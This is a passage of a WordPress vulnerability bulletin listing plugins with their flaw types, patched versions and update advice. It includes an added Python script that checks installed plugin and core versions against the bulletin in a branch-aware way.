Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Predictive Search for WooCommerce

Vulnerability: Cross-Site Request Forgery via multiple AJAX actions
Patched Version: 5.8.1
Recommended Action: Update to version 5.8.1, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Authenticated (Follow-up emails manager+) SQL Injection
Patched Version: 4.9.51
Recommended Action: Update to version 4.9.51, or a newer patched version

Plugin: Font Awesome 4 Menus

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to plugin installation
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Bulk Edit and Create User Profiles – WP Sheet Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.14
Recommended Action: Update to version 1.5.14, or a newer patched version

Plugin: Advanced Popups

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.5.7, 1.6.4, 1.7.4

Plugin: Simple Tooltips

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: dm-albums

Vulnerability: Remote File Inclusion
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.13
Recommended Action: Update to version 3.0.13, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Newsletter by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Feed Statistics

Vulnerability: Open Redirect
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Simple 301 Redirects – Addon – Bulk Uploader

Vulnerability: Missing Authentication on Option Changes
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Yes/No Chart

Vulnerability: Authenticated SQL Injection
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Advanced Custom Fields: Extended

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.8.9.4
Recommended Action: Update to version 0.8.9.4, or a newer patched version

Plugin: Short URL

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Leyka

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: 3.30.7.1
Recommended Action: Update to version 3.30.7.1, or a newer patched version

Plugin: BuddyPress Xprofile Custom Fields Type

Vulnerability: Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Privilege Escalation to Arbitrary Post Modification
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: My Content Management

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.20
Recommended Action: Update to version 1.1.20, or a newer patched version

Plugin: Track The Click

Vulnerability: Authenticated (Author+) SQL Injection via ‘stats’ REST Endpoint
Patched Version: 0.3.12
Recommended Action: Update to version 0.3.12, or a newer patched version

Plugin: GTmetrix for WordPress

Vulnerability: Reflected Cross-Site Scripting via ‘url’
Patched Version: 0.4.6
Recommended Action: Update to version 0.4.6, or a newer patched version

Plugin: WP Edit Menu

Vulnerability: Missing Authorization to Post Deletion
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘logPageContent’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Mikiurl WordPress Eklentisi

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fluent Support – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery leading to Plugin/Subscription Deletion
Patched Version: 6.0.3.0
Recommended Action: Update to version 6.0.3.0, or a newer patched version

Plugin: Easy Digital Downloads – Amazon S3

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Insecure Deserialization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Marketo Forms and Tracking

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LWS Affiliation

Vulnerability: Missing Authorization Checks
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Options Disclosure
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: IP Blacklist Cloud

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: videowall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Unrestricted File Upload
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Advanced Comment Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Beautiful Cookie Consent Banner

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Denial of Service
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: QuBot – Chatbot Builder with Templates

Vulnerability: Unauthenticated Self-Based Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Bestbooks

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Internal Link Building

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booking Calendar Contact Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Contact Form 7 extension for Google Map fields

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Symposium

Vulnerability: Open Redirection
Patched Version: 13.05
Recommended Action: Update to version 13.05, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Missing Authorization to Post Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Network Tabs

Vulnerability: Social Media API Key Leakage (affects versions <= 1.7.1)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: zingiri-web-shop

Vulnerability: Multiple Vulnerabilities
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Missing Authorization to Custom Drop-Down Currency Switcher Creation
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: SlickQuiz

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customizer Export/Import

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 0.9.6
Recommended Action: Update to version 0.9.6, or a newer patched version

Plugin: My Page Order

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Not specified in this bulletin (affects versions < 5.7)
Patched Version: 5.7
Recommended Action: Update to version 5.7, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Reflected Cross-Site Scripting via ‘s’ parameter
Patched Version: 8.0.7
Recommended Action: Update to version 8.0.7, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Open Redirect
Patched Version: 4.8.5
Recommended Action: Update to version 4.8.5, or a newer patched version

Plugin: AB Press Optimizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Hotel Booking

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.10.2
Recommended Action: Update to version 1.10.2, or a newer patched version

Plugin: WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.38
Recommended Action: Update to version 3.1.38, or a newer patched version

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: Cross-Site Request Forgery via ‘send_test’
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: Missing Authorization via clicked
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Social Sharing Plugin – Sassy Social Share

Vulnerability: Object Injection
Patched Version: 3.3.24
Recommended Action: Update to version 3.3.24, or a newer patched version

Plugin: Page Security & Membership

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery To Holiday Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.9.1
Recommended Action: Update to version 1.7.9.1, or a newer patched version

Plugin: Emag Marketplace Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: SiteSuperCharger

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: SVG Support

Vulnerability: Not specified in this bulletin (affects version 2.5.1)
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery via wp-trackback.php
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3
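Every recommended action above reduces to one check per installed component: is the installed version at or above the patched release that applies to it? For single-version entries that is a plain version comparison, but for entries that list one patched release per branch (the Yoast SEO entry above and the WordPress core entry just listed) the comparison has to stay inside the installed version's own branch: a site on 5.9.4 is not fixed just because 6.0.3 exists, it needs 5.9.5, and comparing against the lowest listed release (3.7.40) would wrongly pass it. The script below is an added example, not code from this bulletin's publisher or from WordPress; it parses entries in this page's own format, applies that branch-aware comparison, and reports what is exposed. The bulletin excerpt and the plugin inventory are constructed inline; the inventory is shaped like the output of `wp plugin list --fields=title,version --format=json` and `wp core version`, matching on plugin title is an assumption (bulletin names and plugin headers do not always agree), and the version comparison ignores pre-release suffixes.

```python
import json
import re
from typing import Dict, List, Optional, Tuple

# Constructed excerpt in this bulletin's "Plugin:/Core:" format (action text shortened).
BULLETIN = """
Plugin: Gravity Forms

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Twitter Bootstrap Slider

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available.

Core: WordPress

Vulnerability: Cross-Site Request Forgery via wp-trackback.php
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 4.9.22, 5.9.5, 6.0.3
"""

# Constructed inventory shaped like `wp plugin list --fields=title,version --format=json` and `wp core version`.
INSTALLED = json.loads("""[
  {"title": "Gravity Forms", "version": "2.7.3"},
  {"title": "Twitter Bootstrap Slider", "version": "1.2"},
  {"title": "Real3D Flipbook", "version": "3.0.1"}
]""")
CORE_VERSION = "5.9.4"

ENTRY_RE = re.compile(r"^(Plugin|Core): (.+)$")
FIELD_RE = re.compile(r"^(Vulnerability|Patched Version|Recommended Action): (.*)$")

def parse_version(v: str) -> Tuple[int, ...]:
    """Dotted numeric version -> tuple of ints. Pre-release suffixes (beta, RC) are
    ignored, a simplification of PHP's version_compare (assumption)."""
    parts = tuple(int(p) for p in re.findall(r"\d+", v))
    if not parts:
        raise ValueError(f"unparseable version: {v!r}")
    return parts

def version_ge(a: str, b: str) -> bool:
    """a >= b, zero-padded so that 2.9 and 2.9.0 compare equal."""
    ta, tb = parse_version(a), parse_version(b)
    n = max(len(ta), len(tb))
    return ta + (0,) * (n - len(ta)) >= tb + (0,) * (n - len(tb))

def branch(v: str) -> Tuple[int, int]:
    """Release branch (major, minor): 5.9.4 -> (5, 9)."""
    t = parse_version(v) + (0, 0)
    return t[0], t[1]

def is_fixed(installed: str, patched: List[str]) -> bool:
    """Compare within the installed version's own branch when one is listed (5.9.4 must
    reach 5.9.5, not merely exceed 3.7.40). With no release listed for that branch the
    newest listed release is the bar, so anything above every listed release is fixed."""
    if not patched:
        return False
    same = [p for p in patched if branch(p) == branch(installed)]
    return version_ge(installed, max(same or patched, key=parse_version))

def parse_bulletin(text: str) -> List[Dict]:
    """Bulletin text -> entries; `patched` is empty when no fix exists."""
    entries: List[Dict] = []
    cur: Optional[Dict] = None
    for line in (raw.strip() for raw in text.splitlines()):
        if m := ENTRY_RE.match(line):
            cur = {"kind": m[1], "name": m[2], "vulnerability": "", "patched": []}
            entries.append(cur)
        elif cur and (m := FIELD_RE.match(line)):
            field, value = m.groups()
            if field == "Vulnerability":
                cur["vulnerability"] = value
            elif field == "Patched Version" and value != "No patched version available":
                cur["patched"] = [value]
            elif field == "Recommended Action" and "following versions" in value:
                # Multi-branch entries list every patched release after the last colon.
                cur["patched"] = [v.strip() for v in value.rsplit(":", 1)[1].split(",")]
    return entries

def find_exposures(entries: List[Dict], installed: List[Dict], core_version: str) -> List[Tuple[str, str, str]]:
    """(name, installed version, vulnerability) for each unfixed entry naming an installed
    component. Matching on the plugin title is an assumption; names do not always agree."""
    by_title = {p["title"]: p["version"] for p in installed}
    exposed = []
    for e in entries:
        v = core_version if e["kind"] == "Core" else by_title.get(e["name"])
        if v is not None and not is_fixed(v, e["patched"]):
            exposed.append((e["name"], v, e["vulnerability"]))
    return exposed

if __name__ == "__main__":
    for name, v, vuln in find_exposures(parse_bulletin(BULLETIN), INSTALLED, CORE_VERSION):
        print(f"EXPOSED  {name} {v}: {vuln}")
```

Run as-is it reports three exposures (Gravity Forms 2.7.3, the unpatched Twitter Bootstrap Slider, and core 5.9.4); the installed Real3D Flipbook is skipped because the excerpt has no entry for it. In practice feed it the full bulletin text and the real `wp plugin list` output, and treat any hit on an entry with no patched version as a removal decision rather than an update.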

Plugin: Easy2Map

Vulnerability: SQL Injection
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: WP Design Maps & Places

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: W3 Total Cache

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via ‘mf_payment_status’ shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: DrawIt (draw.io)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.0.07
Recommended Action: Update to version 5.0.07, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Blind SQL Injection
Patched Version: 1.5.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.5.7, 1.6.4, 1.7.4

Plugin: WP Remote Upload

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Mail Logging

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 1.12.0
Recommended Action: Update to version 1.12.0, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 5.4.3
Recommended Action: Update to version 5.4.3, or a newer patched version

Plugin: CRM Perks Forms – WordPress Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Missing Authorization Checks leading to Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Responsive Tabs horizontal vertical and accordion Tabs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 5.0.8
Recommended Action: Update to version 5.0.8, or a newer patched version

Plugin: Activity Reactions For Buddypress

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Slider

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Libre Form 2

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in migrateCommonToProductOnly function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: WP-DBManager

Vulnerability: OS Command Injection
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: DNUI

Vulnerability: Cross-Site Request Forgery leading to Unused Image Deletion and Database Image Access
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Tweet

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Category SEO Meta Tags

Vulnerability: Cross-Site Request Forgery via csmt_admin_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Cross-Site Scripting
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: WPML

Vulnerability: Missing Authorization to Settings Change
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: Site Reviews

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘selectAll’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: FluentCRM – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution

Vulnerability: Not specified in this bulletin (affects versions <= 2.8.01)
Patched Version: 2.8.02
Recommended Action: Update to version 2.8.02, or a newer patched version

Plugin: PrivateContent

Vulnerability: Protection Mechanism Bypass
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: SALESmanago

Vulnerability: Log Injection via Weak Authentication Token
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: IP Address Spoofing
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Maps Widget for Google Maps

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.25
Recommended Action: Update to version 4.25, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.30.3
Recommended Action: Update to version 5.30.3, or a newer patched version

Plugin: P3 (Plugin Performance Profiler)

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.3.9
Recommended Action: Update to version 1.5.3.9, or a newer patched version

Plugin: Sender by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Show-Hide / Collapse-Expand

Vulnerability: Missing Authorization
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Insecure Password Reset Mechanism
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: 0mk Shortener

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gravity Forms Google Sheet Connector

Vulnerability: Cross-Site Request Forgery via verify_code_integation_new
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: HT Menu – WordPress Mega Menu Builder for Elementor

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Authenticated (Admin+) SQL Injection via ‘tp_editor’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Made Easy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.21
Recommended Action: Update to version 1.6.21, or a newer patched version

Plugin: Cryptocurrency Widgets – Price Ticker & Coins List

Vulnerability: Missing Authorization
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: WPB Show Core

Vulnerability: Unauthenticated Server Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTML5 Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.5.7
Recommended Action: Update to version 1.6.5.7, or a newer patched version

Plugin: ActiveCampaign – Forms, Site Tracking, Live Chat

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.2
Recommended Action: Update to version 8.0.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 3.6.13
Recommended Action: Update to version 3.6.13, or a newer patched version

Plugin: WP Fountain

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CP Image Store with Slideshow

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.68
Recommended Action: Update to version 1.0.68, or a newer patched version

Plugin: Image Tag Manager

Vulnerability: Reflected Cross-Site Scripting via default_class
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Bookings for Zoom GoogleMeet and more – Wappointment

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Print-O-Matic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Open Redirection
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: DoLogin Security

Vulnerability: IP Address Spoofing
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Privilege Escalation
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Notice Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Simple JWT Login – Allows you to use JWT on REST endpoints.

Vulnerability: Insecure Password Creation
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Privilege Escalation
Patched Version: 3.0.18
Recommended Action: Update to version 3.0.18, or a newer patched version

Plugin: AccessPress Social Icons

Vulnerability: Backdoor
Patched Version: 1.8.3
